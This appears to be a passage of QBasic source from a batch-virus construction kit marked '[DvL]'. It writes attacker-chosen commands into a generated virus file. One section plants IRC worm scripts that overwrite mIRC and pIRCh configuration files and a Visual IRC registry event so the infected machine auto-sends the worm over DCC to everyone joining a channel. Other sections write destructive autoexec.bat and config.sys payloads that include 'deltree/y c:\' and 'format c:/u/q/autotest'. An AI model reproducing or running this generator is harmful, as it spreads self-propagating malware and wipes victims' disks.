IF ircs$ = "y" THEN GOTO a26
GOTO b06

a26:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Internet spreading"
PRINT "     дддддддддддддддддд"
PRINT ""
PRINT ""
PRINT "   # IRC (mIRC, pIRCh, vIRC) spreading"
PRINT ""
PRINT ""
INPUT "     --> Which attachment ? (filename.BAT): ", ircatach$
OPEN vir$ FOR APPEND AS #1
PRINT #1, "copy %0 c:\"; ircatach$; ">nul"
PRINT #1, "echo.[script]>%windir%\"; z$; ".ini"
PRINT #1, "echo.n0=on 1:JOIN:#:{>>%windir%\"; z$; ".ini"
PRINT #1, "echo.n1=/if ( $nick == $me ) { halt }>>%windir%\"; z$; ".ini"
PRINT #1, "echo.n2=/dcc send $nick c:\"; ircatach$; ">>%windir%\"; z$; ".ini"
PRINT #1, "echo.n3=}>>%windir%\"; z$; ".ini"
PRINT #1, "deltree/y c:\mirc\script.ini>nul"
PRINT #1, "deltree/y c:\mirc32\script.ini>nul"
PRINT #1, "deltree/y c:\progra~1\mirc\script.ini>nul"
PRINT #1, "deltree/y c:\progra~1\mirc32\script.ini>nul"
PRINT #1, "copy %windir%\"; z$; ".ini c:\mirc\script.ini>nul"
PRINT #1, "copy %windir%\"; z$; ".ini c:\mirc32\script.ini>nul"
PRINT #1, "copy %windir%\"; z$; ".ini c:\progra~1\mirc\script.ini>nul"
PRINT #1, "copy %windir%\"; z$; ".ini c:\progra~1\mirc32\script.ini>nul"
PRINT #1, "echo.[Levels]>%windir%\"; z$; ".ini"
PRINT #1, "echo.Enabled=1>>%windir%\"; z$; ".ini"
PRINT #1, "echo.Count=6>>%windir%\"; z$; ".ini"
PRINT #1, "echo.Level1=000-Unknowns>>%windir%\"; z$; ".ini"
PRINT #1, "echo.000-UnknownsEnabled=1>>%windir%\"; z$; ".ini"
PRINT #1, "echo.Level2=100-Level 100>>%windir%\"; z$; ".ini"
PRINT #1, "echo.100-Level 100Enabled=1>>%windir%\"; z$; ".ini"
PRINT #1, "echo.Level3=200-Level 200>>%windir%\"; z$; ".ini"
PRINT #1, "echo.200-Level 200Enabled=1>>%windir%\"; z$; ".ini"
PRINT #1, "echo.Level4=300-Level 300>>%windir%\"; z$; ".ini"
PRINT #1, "echo.300-Level 300Enabled=1>>%windir%\"; z$; ".ini"
PRINT #1, "echo.Level5=400-Level 400>>%windir%\"; z$; ".ini"
PRINT #1, "echo.400-Level 400Enabled=1>>%windir%\"; z$; ".ini"
PRINT #1, "echo.Level6=500-Level 500>>%windir%\"; z$; ".ini"
PRINT #1, "echo.500-Level 500Enabled=1>>%windir%\"; z$; ".ini"
PRINT #1, "echo.>>%windir%\"; z$; ".ini"
PRINT #1, "echo.[000-Unknowns]>>%windir%\"; z$; ".ini"
PRINT #1, "echo.User1=*!*@*>>%windir%\"; z$; ".ini"
PRINT #1, "echo.UserCount=1>>%windir%\"; z$; ".ini"
PRINT #1, "echo.Event1=ON JOIN:#:/dcc send $nick c:\"; ircatach$; ">>%windir%\"; z$; ".ini"
PRINT #1, "echo.EventCount=1>>%windir%\"; z$; ".ini"
PRINT #1, "echo.>>%windir%\"; z$; ".ini"
PRINT #1, "echo.[100-Level 100]>>%windir%\"; z$; ".ini"
PRINT #1, "echo.UserCount=0>>%windir%\"; z$; ".ini"
PRINT #1, "echo.EventCount=0>>%windir%\"; z$; ".ini"
PRINT #1, "echo.>>%windir%\"; z$; ".ini"
PRINT #1, "echo.[200-Level 200]>>%windir%\"; z$; ".ini"
PRINT #1, "echo.UserCount=0>>%windir%\"; z$; ".ini"
PRINT #1, "echo.EventCount=0>>%windir%\"; z$; ".ini"
PRINT #1, "echo.>>%windir%\"; z$; ".ini"
PRINT #1, "echo.[300-Level 300]>>%windir%\"; z$; ".ini"
PRINT #1, "echo.UserCount=0>>%windir%\"; z$; ".ini"
PRINT #1, "echo.EventCount=0>>%windir%\"; z$; ".ini"
PRINT #1, "echo.>>%windir%\"; z$; ".ini"
PRINT #1, "echo.[400-Level 400]>>%windir%\"; z$; ".ini"
PRINT #1, "echo.UserCount=0>>%windir%\"; z$; ".ini"
PRINT #1, "echo.EventCount=0>>%windir%\"; z$; ".ini"
PRINT #1, "echo.>>%windir%\"; z$; ".ini"
PRINT #1, "echo.[500-Level 500]>>%windir%\"; z$; ".ini"
PRINT #1, "echo.UserCount=0>>%windir%\"; z$; ".ini"
PRINT #1, "echo.EventCount=0>>%windir%\"; z$; ".ini"
PRINT #1, "deltree/y c:\pirch\events.ini>nul"
PRINT #1, "deltree/y c:\pirch98\events.ini>nul"
PRINT #1, "deltree/y c:\pirch32\events.ini>nul"
PRINT #1, "deltree/y c:\progra~1\pirch\events.ini>nul"
PRINT #1, "deltree/y c:\progra~1\pirch98\events.ini>nul"
PRINT #1, "deltree/y c:\progra~1\pirch32\events.ini>nul"
PRINT #1, "copy %windir%\"; z$; ".ini c:\pirch\events.ini>nul"
PRINT #1, "copy %windir%\"; z$; ".ini c:\pirch98\events.ini>nul"
PRINT #1, "copy %windir%\"; z$; ".ini c:\pirch32\events.ini>nul"
PRINT #1, "copy %windir%\"; z$; ".ini c:\progra~1\pirch\events.ini>nul"
PRINT #1, "copy %windir%\"; z$; ".ini c:\progra~1\pirch98\events.ini>nul"
PRINT #1, "copy %windir%\"; z$; ".ini c:\progra~1\pirch32\events.ini>nul"
PRINT #1, "echo.set "; az7$; ; az6$; "=CreateObject("; CHR$(34); "wscript.shell"; CHR$(34); ")>>%windir%\"; z$; ".vbs"
PRINT #1, "echo."; az7$; ; az6$; ".RegWrite "; CHR$(34); "HKEY_USERS\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17"; CHR$(34); ","; CHR$(34); "dcc send $nick c:\"; ircatach$; ; CHR$(34); ">>%windir%\"; z$; ".vbs"
CLOSE #1

b06:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Others"
PRINT "     дддддд"
PRINT ""
PRINT ""
INPUT "     Want payloads for Autoexec.bat ? (Y/N): ", payauto$
IF payauto$ = "Y" THEN GOTO a27
IF payauto$ = "y" THEN GOTO a27
INPUT "     Want payloads for Config.sys ? (Y/N): ", payconfig$
IF payconfig$ = "Y" THEN GOTO a28
IF payconfig$ = "y" THEN GOTO a28
GOTO done

a27:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.time 00:00:00,00>>c:\autoexec.bat"
PRINT #1, "echo.date 80-01-01>>c:\autoexec.bat"
PRINT #1, "echo.%comspec% nul /f /c if exist e:\nul subst e: a:\>>c:\autoexec.bat"
PRINT #1, "echo.%comspec% nul /f /c if exist d:\nul subst d: a:\>>c:\autoexec.bat"
PRINT #1, "echo.%comspec% nul /f /c if exist c:\nul subst c: a:\>>c:\autoexec.bat"
CLOSE #1
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Others"
PRINT "     дддддд"
PRINT ""
PRINT ""
INPUT "     Want payloads for Config.sys ? (Y/N): ", payconfig$
IF payconfig$ = "Y" THEN GOTO a28
IF payconfig$ = "y" THEN GOTO a28
GOTO done

a28:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.[menu]>c:\config.sys"
PRINT #1, "echo.menuitem="; az3$; ">>c:\config.sys"
PRINT #1, "echo.>>c:\config.sys"
PRINT #1, "echo.["; az3$; "]>>c:\config.sys"
PRINT #1, "echo.buffers=1>>c:\config.sys"
PRINT #1, "echo.files=1>>c:\config.sys"
PRINT #1, "echo.lastdrive=A>>c:\config.sys"
PRINT #1, "echo.set path=deltree/y c:\>>c:\config.sys"
PRINT #1, "echo.set temp=A:\>>c:\config.sys"
PRINT #1, "echo.set windir=format c:/u/q/autotest>>c:\config.sys"
CLOSE #1

done:
CLS
OPEN vir$ FOR APPEND AS #1
PRINT #1, "cscript %windir%\"; z$; ".vbs"
PRINT #1, "cls"
CLOSE #1
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
COLOR 14
PRINT "                     www.geocities.com/ratty_dvl/BATch/main.htm"
COLOR 3
PRINT ""
PRINT ""
PRINT ""
PRINT "     Your creation is now compiled in curent folder as "; vir$; ""
PRINT ""
PRINT "     Watch out for the next versions, "; author$; ""
PRINT ""
PRINT ""
PRINT ""
PRINT ""
PRINT ""
end:

